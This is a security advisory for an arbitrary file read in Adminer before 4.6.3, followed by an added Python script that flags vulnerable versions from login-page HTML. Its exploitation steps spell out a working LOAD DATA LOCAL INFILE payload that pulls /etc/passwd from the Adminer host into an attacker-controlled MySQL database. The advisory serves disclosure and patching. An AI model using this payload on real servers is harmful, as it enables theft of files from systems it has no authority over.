- Title : Adminer < 4.6.3 - Arbitrary File Read
- Author : @Podalirius
- CVSS : 7.5 (High)
- CVSS Vector :

Description
Improper Access Control in Adminer versions <= 4.6.2 (fixed in version 4.6.3) allows an attacker to achieve Arbitrary File Read on the server by connecting Adminer to a remote MySQL database. An attacker who can reach the Adminer login page connects it back to a MySQL database he controls, then reads and exfiltrates local files from the Adminer host with the SQL statement LOAD DATA LOCAL INFILE.

Affected products and versions
All Adminer versions between 1.12.0 and 4.6.2 (included) are vulnerable.

Exploitation
1. The attacker accesses the login page of Adminer and connects it back to a remote MySQL database he controls.
2. The attacker then goes to the "SQL Command" page in Adminer.
3. With the following SQL command, the attacker reads a local file on the Adminer server line by line and loads it into his remote database:
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE lfr_sink_table FIELDS TERMINATED BY "\n";
4. Once this is done, the attacker can view the contents of the file with:
SELECT * FROM lfr_sink_table;

Fix
Update Adminer to the latest version, or to any version >= 4.6.3. This vulnerability was fixed by the editor in version 4.6.3.
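To turn the affected range above into something an administrator can run against an inventory of Adminer deployments, here is an added Python example (not part of the advisory and not Adminer's own code). It parses the version string that Adminer prints on its login page and classifies the deployment as inside or outside the vulnerable range 1.12.0 to 4.6.2 (inclusive). The sample HTML fragments are constructed for illustration, and the regex assumes the page contains "Adminer" followed by a three-part version number, possibly separated by markup; both are assumptions, not facts taken from the advisory.

```python
import re

# Inclusive range of vulnerable Adminer releases, as stated in the advisory.
FIRST_VULNERABLE = (1, 12, 0)
LAST_VULNERABLE = (4, 6, 2)
FIXED_IN = (4, 6, 3)

# Assumption: the login page shows "Adminer" and then a three-part version,
# possibly with HTML tags or whitespace in between.
VERSION_RE = re.compile(r"Adminer(?:\s|<[^>]*>)*(\d+)\.(\d+)\.(\d+)")


def parse_version(html):
    """Return the Adminer version as an int tuple, or None if not found."""
    match = VERSION_RE.search(html)
    if match is None:
        return None
    return tuple(int(part) for part in match.groups())


def is_vulnerable(version):
    """True when the version lies within the advisory's affected range.

    Tuples are compared numerically per component, so 4.6.10 correctly
    sorts after 4.6.2 (a plain string comparison would get this wrong).
    """
    return FIRST_VULNERABLE <= version <= LAST_VULNERABLE


def assess(html):
    """Classify one fetched page as 'vulnerable', 'not affected' or 'unknown'."""
    version = parse_version(html)
    if version is None:
        return "unknown"
    return "vulnerable" if is_vulnerable(version) else "not affected"


def triage(inventory):
    """Map {host: html} to {host: status} for a whole inventory."""
    return {host: assess(html) for host, html in inventory.items()}


# Constructed sample pages; they only imitate the shape of an Adminer header.
SAMPLE_PAGES = {
    "db-admin-1": "<h1><a href='https://www.adminer.org/'>Adminer</a> "
                  "<span class='version'>4.6.2</span></h1>",
    "db-admin-2": "<h1>Adminer <span class='version'>4.6.3</span></h1>",
    "db-admin-3": "<h1>Adminer <span class='version'>1.11.9</span></h1>",
    "db-admin-4": "<html><body>Login</body></html>",
}

if __name__ == "__main__":
    for host, status in sorted(triage(SAMPLE_PAGES).items()):
        print(f"{host}: {status}")
```

Only the deployment reporting 4.6.2 is flagged; 4.6.3 is the fixed release and 1.11.9 predates the affected range. A page with no recognisable version is reported as unknown rather than silently treated as safe, which is the conservative choice for a triage script.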